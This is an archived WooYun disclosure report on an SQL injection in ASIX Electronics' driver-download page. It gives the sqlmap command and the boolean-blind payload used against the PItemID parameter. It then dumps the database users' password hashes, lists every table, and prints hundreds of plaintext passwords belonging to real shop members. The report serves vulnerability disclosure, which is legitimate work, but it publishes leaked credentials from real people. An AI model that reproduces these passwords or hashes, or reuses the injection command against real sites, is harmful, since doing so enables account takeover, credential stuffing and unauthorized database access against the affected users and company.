当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157411

漏洞标题:ASIX Electronics主站存在SQL注射漏洞(DBA权限+root密码+系统管理密码+大量用户明文密码)(臺灣地區)

相关厂商:ASIX Electronics

漏洞作者: 路人甲

提交时间:2015-12-03 11:28

修复时间:2016-01-21 01:00

公开时间:2016-01-21 01:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

ASIX Electronics Corporation is a leading fabless semiconductor supplier with focus on networking, communication and connectivity applications. ASIX was founded in May 1995 in Hsinchu Science Park, Taiwan, and has been listed on Taiwan OTC Stock Exchange (TAIEX code 3169) since November 2009. ASIX's customers include those companies with premium brand name in the networking and communication industries. ASIX works closely with the leaders in the networking industry to provide highly integrated solution for customer applications. ASIX has been certified as an ISO 9001 and 14001 suppliers. This achievement represents our continuing commitment to maintain a world-class quality system.

详细说明:

地址:http://**.**.**.**/cs/download.php?sub=driverdetail&PItemID=105

$ python sqlmap.py -u "http://**.**.**.**/cs/download.php?sub=driverdetail&PItemID=105" -p PItemID --technique=B --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass


current user:    'asix@localhost'
current user is DBA: True
database management system users [3]:
[*] 'asix'@'localhost'
[*] 'root'@'localhost'
[*] 'round'@'localhost'
database management system users password hashes:
[*] asix [1]:
password hash: *54133694BC32EB47844334CC51FAA832D00B1350
[*] root [1]:
password hash: *1BB84E0F9BA7E39468E5D323618432482F1915DA
[*] round [1]:
password hash: *40FDFCC21D2DA426E049E9A312DE2AB617E358CE


Database: CDB_ASIX
Table: Asix_shop_member
[353 entries]
+------------------+
| MemPasswd |
+------------------+
| !!Sunny1 |
| !Pa55w0rd |
| $pace00005 |
| 006120abc |
| 011angelfkwlsejr |
| 0313033 |
| 08931ro-31FDaq |
| 123456 |
| 123456 |
| 123456 |
| 12345678 |
| 12345678qwe+ |
| 123joe123 |
| 189252 |
| 19Ayers54# |
| 19Ayers54$ |
| 19dfi2fiaX |
| 1fasixf1 |
| 1Marvin |
| 1nrt090 |
| 1q2w3e4r |
| 1st@nbul |
| 1standpark |
| 23303331 |
| 25031990 |
| 26102610 |
| 27096963 |
| 28112008 |
| 2819182 |
| 2jplm2 |
| 55121812 |
| 576985 |
| 6007095307 |
| 628Skogl |
| 713803 |

漏洞证明:

---
Parameter: PItemID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sub=driverdetail&PItemID=105 AND 9968=9968
---
web server operating system: FreeBSD
web application technology: PHP 5.4.28, Apache 2.2.27
back-end DBMS: MySQL >= 5.0.0
current user: 'asix@localhost'
current user is DBA: True
database management system users [3]:
[*] 'asix'@'localhost'
[*] 'root'@'localhost'
[*] 'round'@'localhost'
database management system users password hashes:
[*] asix [1]:
password hash: *54133694BC32EB47844334CC51FAA832D00B1350
[*] root [1]:
password hash: *1BB84E0F9BA7E39468E5D323618432482F1915DA
[*] round [1]:
password hash: *40FDFCC21D2DA426E049E9A312DE2AB617E358CE
Database: CDB_ASIX
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| Asix_shop_cart | 14858 |
| Asix_Reg_Member | 11784 |
| Asix_product_Item_Feature | 2711 |
| Asix_Reg_Filter | 1785 |
| Asix_request | 1593 |
| Asix_product_Item_app | 1080 |
| Asix_shop_cart_checksum | 810 |
| Asix_product_Item_faq | 694 |
| Asix_product_Item_driver | 550 |
| Asix_shop_result | 446 |
| Asix_shop_member | 353 |
| Asix_news_publish | 260 |
| Asix_shop_errorcode | 255 |
| Asix_product_Item_driver_OSkind | 238 |
| Asix_Reg_Country | 232 |
| Asix_product_Item_datasheet | 164 |
| Asix_product_Item_brief | 137 |
| Asix_product_Item | 136 |
| Asix_product_Item_support_report | 126 |
| Asix_product_Item_application | 106 |
| Asix_news_publish_alias | 99 |
| Asix_distributor | 77 |
| Asix_shop_country | 76 |
| Asix_product_Item_support_gerber | 62 |
| Asix_shop_product | 60 |
| Asix_product_Item_support_utility | 58 |
| Asix_product_Item_support_protocol | 56 |
| Asix_product_Item_Layout | 51 |
| Asix_product_Item_support_design | 49 |
| Asix_product_Item_support_IBIS | 45 |
| Asix_product_Item_support_firmware | 44 |
| Asix_product_Item_support_BOM | 41 |
| Asix_product_Item_DB | 37 |
| Asix_shop_country_ship_weight | 36 |
| Asix_news_publish_source | 31 |
| Asix_news | 29 |
| Asix_distributor_territory | 28 |
| Asix_product_Item_support_guide | 28 |
| Asix_product_Item_support_PCB | 26 |
| Asix_distributor_sub_territory | 20 |
| Asix_product_Series | 19 |
| Asix_product_Item_HotPicture | 16 |
| Asix_product_Item_support_gerber_notes | 16 |
| Asix_product_Item_photo | 14 |
| Asix_product_Item_Driver_Notes | 13 |
| Asix_shop_country_ship | 12 |
| Asix_product_Item_Attach | 10 |
| Asix_product_Item_guide | 9 |
| Asix_product_Item_support_kit | 8 |
| Asix_request_product | 8 |
| Asix_product_Line | 7 |
| Asix_product_SubSeries | 7 |
| Asix_product_Item_status | 5 |
| Asix_distributor_area | 4 |
| Asix_product_Item_faq_cate | 4 |
| Asix_product_Item_Video | 4 |
| Asix_shop_product_line | 4 |
| Asix_product_Item_DB_Status | 3 |
| Asix_distributor_corporate | 2 |
| Asix_shop_category | 2 |
| Asix_shop_exchange | 1 |
| Asix_website_hit | 1 |
+----------------------------------------+---------+
Database: performance_schema
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+----------------------------------------+---------+
Database: MYSPAM
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| myspam_filter | 1 |
+----------------------------------------+---------+
Database: roundcubemail
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| identities | 36 |
| users | 36 |
| `session` | 18 |
| contacts | 2 |
| system | 1 |
+----------------------------------------+---------+
Database: mysql
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| help_relation | 726 |
| help_topic | 458 |
| help_keyword | 378 |
| help_category | 36 |
| `user` | 3 |
| proxies_priv | 1 |
+----------------------------------------+---------+
Database: test
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| Asix_news_publish_alias | 46 |
+----------------------------------------+---------+
Database: CDB_ASIX_CS
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| Asix_product_Item_Feature | 2633 |
| Asix_product_Item_app | 1079 |
| Asix_Reg_Filter | 941 |
| Asix_request | 595 |
| Asix_product_Item_faq | 474 |
| Asix_news_publish | 263 |
| Asix_Reg_Country | 232 |
| Asix_product_Item | 136 |
| Asix_product_Item_brief | 135 |
| Asix_news_publish_alias | 101 |
| Asix_product_Item_driver | 87 |
| Asix_distributor | 77 |
| Asix_product_Item_driver_OSkind | 51 |
| Asix_news | 35 |
| Asix_news_publish_source | 32 |
| Asix_product_Item_application | 31 |
| Asix_distributor_territory | 28 |
| Asix_distributor_sub_territory | 20 |
| Asix_product_Item_DB | 20 |
| Asix_product_Series | 19 |
| Asix_product_Item_datasheet | 16 |
| Asix_product_Item_Layout | 15 |
| Asix_product_Item_HotPicture | 14 |
| Asix_product_Item_photo | 14 |
| Asix_product_Item_Driver_Notes | 11 |
| Asix_product_Item_Attach | 10 |
| Asix_product_Item_guide | 9 |
| Asix_request_product | 8 |
| Asix_product_Line | 7 |
| Asix_product_SubSeries | 7 |
| Asix_product_Item_status | 5 |
| Asix_distributor_area | 4 |
| Asix_product_Item_faq_cate | 4 |
| Asix_product_Item_Video | 4 |
| Asix_distributor_corporate | 2 |
| Asix_product_Item_DB_Status | 2 |
| Asix_website_hit | 1 |
+----------------------------------------+---------+
Database: CDB_ASIX_CT
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| Asix_product_Item_Feature | 2629 |
| Asix_product_Item_app | 1079 |
| Asix_Reg_Filter | 941 |
| Asix_request | 503 |
| Asix_product_Item_faq | 473 |
| Asix_news_publish | 262 |
| Asix_Reg_Country | 232 |
| Asix_product_Item | 136 |
| Asix_product_Item_brief | 135 |
| Asix_news_publish_alias | 101 |
| Asix_product_Item_driver | 87 |
| Asix_distributor | 77 |
| Asix_product_Item_driver_OSkind | 51 |
| Asix_news | 35 |
| Asix_news_publish_source | 32 |
| Asix_product_Item_application | 31 |
| Asix_distributor_territory | 28 |
| Asix_distributor_sub_territory | 20 |
| Asix_product_Item_DB | 20 |
| Asix_product_Series | 20 |
| Asix_product_Item_datasheet | 16 |
| Asix_product_Item_Layout | 15 |
| Asix_product_Item_HotPicture | 14 |
| Asix_product_Item_photo | 14 |
| Asix_product_Item_Driver_Notes | 11 |
| Asix_product_Item_Attach | 10 |
| Asix_product_Item_guide | 9 |
| Asix_request_product | 8 |
| Asix_product_Line | 7 |
| Asix_product_SubSeries | 7 |
| Asix_product_Item_status | 5 |
| Asix_distributor_area | 4 |
| Asix_product_Item_faq_cate | 4 |
| Asix_product_Item_Video | 4 |
| Asix_distributor_corporate | 2 |
| Asix_product_Item_DB_Status | 2 |
| Asix_website_hit | 1 |
+----------------------------------------+---------+
Database: information_schema
+----------------------------------------+---------+
| Table | Entries |
+----------------------------------------+---------+
| INNODB_BUFFER_PAGE | 8192 |
| COLUMNS | 3394 |
| INNODB_BUFFER_PAGE_LRU | 478 |
| STATISTICS | 464 |
| KEY_COLUMN_USAGE | 423 |
| PARTITIONS | 371 |
| TABLE_CONSTRAINTS | 371 |
| TABLES | 371 |
| SESSION_VARIABLES | 329 |
| GLOBAL_VARIABLES | 317 |
| GLOBAL_STATUS | 312 |
| SESSION_STATUS | 312 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197 |
| COLLATIONS | 197 |
| USER_PRIVILEGES | 84 |
| CHARACTER_SETS | 39 |
| PLUGINS | 20 |
| PROCESSLIST | 14 |
| SCHEMATA | 13 |
| REFERENTIAL_CONSTRAINTS | 11 |
| ENGINES | 6 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| INNODB_CMPMEM | 5 |
| INNODB_CMPMEM_RESET | 5 |
| INNODB_BUFFER_POOL_STATS | 1 |
+----------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: CDB_ASIX
Table: Asix_shop_member
[1 column]
+-----------+
| Column |
+-----------+
| MemPasswd |
+-----------+
Database: CDB_ASIX
Table: Asix_Reg_Member
[1 column]
+-----------+
| Column |
+-----------+
| MemPasswd |
+-----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column |
+----------+
| Password |
+----------+
Database: mysql
Table: servers
[1 column]
+----------+
| Column |
+----------+
| Password |
+----------+
Database: CDB_ASIX
Table: Asix_shop_member
[353 entries]
+------------------+
| MemPasswd |
+------------------+
| !!Sunny1 |
| !Pa55w0rd |
| $pace00005 |
| 006120abc |
| 011angelfkwlsejr |
| 0313033 |
| 08931ro-31FDaq |
| 123456 |
| 123456 |
| 123456 |
| 12345678 |
| 12345678qwe+ |
| 123joe123 |
| 189252 |
| 19Ayers54# |
| 19Ayers54$ |
| 19dfi2fiaX |
| 1fasixf1 |
| 1Marvin |
| 1nrt090 |
| 1q2w3e4r |
| 1st@nbul |
| 1standpark |
| 23303331 |
| 25031990 |
| 26102610 |
| 27096963 |
| 28112008 |
| 2819182 |
| 2jplm2 |
| 55121812 |
| 576985 |
| 6007095307 |
| 628Skogl |
| 713803 |
| 745751mv |
| 745751mv |
| 7600C200 |
| 76komissarov34 |
| 7d1-4Rt9 |
| 821914 |
| 8250.8564 |
| 8506110899 |
| 8BA46n |
| @Set1472set |
| accxjg92mm |
| ahk0314 |
| Airgasrd12 |
| alcoking@1212 |
| alkinc01 |
| Alveena2007 |
| angelika63 |
| anhlha01 |
| animissa |
| anjusree |
| annie1 |
| apbeta14 |
| Aphysci |
| ariffin89 |
| armela01 |
| Arrival01 |
| asd123 |
| asix0606 |
| asix1126 |
| asix1982 |
| asix2002 |
| asix2284 |
| asix3169 |
| asix45 |
| asix4choe |
| asix4choe |
| asixanne1955 |
| Asixblah12!@ |
| asixGriffin |
| asixgsti |
| asixjsm |
| AsixKwon88: |
| asixshopping |
| at89c55 |
| Aud1oV1sual |
| AUTELSISTEMS |
| avtechuk1 |
| aware1234 |
| Axfonclbr |
| axis_mh070477 |
| bc732abc |
| beta23 |
| BIBENDUM |
| biggulp |
| blueskye |
| boschrtc |
| bruckdorf1 |
| Bruker |
| bttech |
| buz!!g00 |
| byrddrive |
| byrddrive |
| c3incc3inc |
| calim123 |
| calim123 |
| carmine |
| cbf390 |
| ccmiro |
| cecilia |
| celtascortos |
| chemigraphic |
| Cmp0306! |
| coala9488 |
| concord64j |
| concord64j |
| coolumair85.. |
| coppermine |
| coreco |
| cv55ui14 |
| cyw445800 |
| daeseung3388 |
| dan3197 |
| danai123 |
| dataman |
| dave1234 |
| deadletters |
| deindia123 |
| designshift1 |
| devex251210 |
| dgl33ve |
| digitech |
| DO |
| dpmdoc |
| ducati996 |
| dutch1954 |
| ebherira |
| efitronix |
| ELA3mustafa |
| elettronica |
| elosaku |
| elsat1468 |
| esmart2012 |
| Extra300l |
| fiction |
| flex.100% |
| fourtvir69 |
| frankfurt23 |
| frogleg |
| Gandalf3261 |
| GEMINIJONESY |
| ggtech36668656 |
| ghbotnvb |
| gkdanr |
| gosun123 |
| Gramsci1320 |
| grd251405 |
| grosys63633 |
| guliverkel |
| hanasix |
| hanhan |
| hawk$worth |
| Hb!$638g&9aJJg! |
| hejAsix1 |
| hmitditw |
| hostalbin |
| iag123 |
| icd001 |
| Icomera75 |
| IcTl4285 |
| Ii4reequ |
| Inglewood |
| innocmo |
| innovaspa |
| int5705 |
| ipdoor |
| itis4asix |
| J1mb21 |
| jamay5168 |
| Jana2729 |
| jane123 |
| jelwicka |
| joyiwoebay |
| joyiwoebay |
| joyiwoebay |
| Juniper |
| jurasek |
| Jwp4000 |
| kalasi |
| kbs3025 |
| killroy21 |
| kimsc0514 |
| kizero |
| kj94483 |
| kmci30dg |
| kmd8383 |
| kpgdwill25 |
| kr6995 |
| kr6995 |
| ksw1507 |
| kulvinder |
| kwchin |
| lalm0172 |
| lauren1994 |
| line123 |
| lmp300 |
| lobster |
| Lopamiro.123 |
| lynnprod58 |
| mamhlad |
| Marceta12 |
| mast51-boohoo |
| matrox |
| mayada7985 |
| MCS9990 |
| mdcom248 |
| metall666 |
| mgl6866 |
| miked1 |
| miltope |
| miltope |
| mis000 |
| mmmddd |
| mp100dia |
| msdn2k |
| myasix4me |
| mydi3344527 |
| NAC123 |
| namatek |
| neatsettembre |
| needchips |
| nescafepal |
| networks1987 |
| NevoTeam |
| news225 |
| news225 |
| normyy |
| Nottrustedsite |
| Novo0988 |
| nssceec |
| nyce2011 |
| NZPXZRKL |
| og1purch |
| olio22 |
| olympusndt |
| opelcorsa |
| osamakazuika |
| Oshieg&3g2uikGU3 |
| pa55w0rd |
| packzhu1962 |
| Palmerston |
| PAMELA116 |
| parallel |
| Password |
| PeterPetersen |
| pgjasix |
| phantom1 |
| phantom1 |
| pisutt |
| plavi9 |
| pnlabd3511 |
| powersoft19 |
| ppppp1 |
| pravda |
| precidia1 |
| precious |
| prince8888 |
| prodys123 |
| PTINOVACAO |
| pulson1c |
| pulson1c |
| Pulsonic |
| puyh20111101 |
| QFLCt25yDqj6d |
| qpswkals79 |
| QSIC6720 |
| quartics1 |
| qw123qw123 |
| Qw3rty |
| ranchelieu143 |
| rbdlf0502 |
| Ready2go |
| ribs<usc |
| riccardo |
| rkeldjs2020 |
| RKNlove |
| rnj1311 |
| rolltide |
| rover214 |
| rtirti |
| RtoS12 |
| ruJZl0MP |
| Rush2!!2 |
| s3cr3t |
| s3nTmatte |
| sairam |
| Sallyann1 |
| sanyo67 |
| scm33273 |
| Scutum1+ |
| sebaek100 |
| Secure_01 |
| selincuneo |
| sitepitalia |
| sm1ley |
| smc123 |
| smt4211 |
| snm1508 |
| Snow(Bird0) |
| soK22% |
| Space001 |
| SPACEMAN |
| speedy99 |
| spring38 |
| stc4macs |
| stellars |
| stre@mbox |
| sunsunsun |
| sunwoo |
| syko1990 |
| Tbnsh11rFUfz |
| technologies |
| TekPartner |
| Tennis44 |
| tequila |
| test1111 |
| test1111 |
| tianzigang1 |
| tibnor768 |
| tinytag101 |
| tinytag101 |
| tjsrud1 |
| toyo123 |
| tvace598 |
| tvp5150 |
| umayal |

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-07 00:55

厂商回复:

感謝通報

最新状态:

2016-02-20:HITCON 於接獲通報後 email 該網站所示之服務信箱,至漏洞公開時仍無回應。